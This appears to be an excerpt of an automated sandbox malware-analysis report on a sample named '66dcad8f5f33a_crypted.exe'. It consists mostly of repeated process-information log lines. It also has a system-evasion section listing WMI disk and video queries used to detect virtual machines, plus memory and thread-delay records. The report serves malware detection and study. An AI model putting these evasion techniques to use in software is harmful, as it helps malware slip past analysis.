                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\ProgramData\Path\Path.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Signature FROM Win32_DiskDrive
                      Source: C:\ProgramData\Path\Path.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Signature FROM Win32_DiskDrive
                      Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory allocated: 2C40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory allocated: 2E20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeMemory allocated: 2C40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2D10000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 2E50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMemory allocated: 4E50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeMemory allocated: 17D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeMemory allocated: 3140000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeMemory allocated: 5140000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeMemory allocated: 6740000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeMemory allocated: 35740000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeMemory allocated: 38470000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeMemory allocated: 66470000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\Path\Path.exeMemory allocated: 16D0000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\Path\Path.exeMemory allocated: 30C0000 memory reserve | memory write watchJump to behavior
                      Source: C:\ProgramData\Path\Path.exeMemory allocated: 3000000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\66dcad8f5f33a_crypted.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597766Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597641Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597516Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597406Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\filename.exeThread delayed: delay time: 597297Jump to behavior
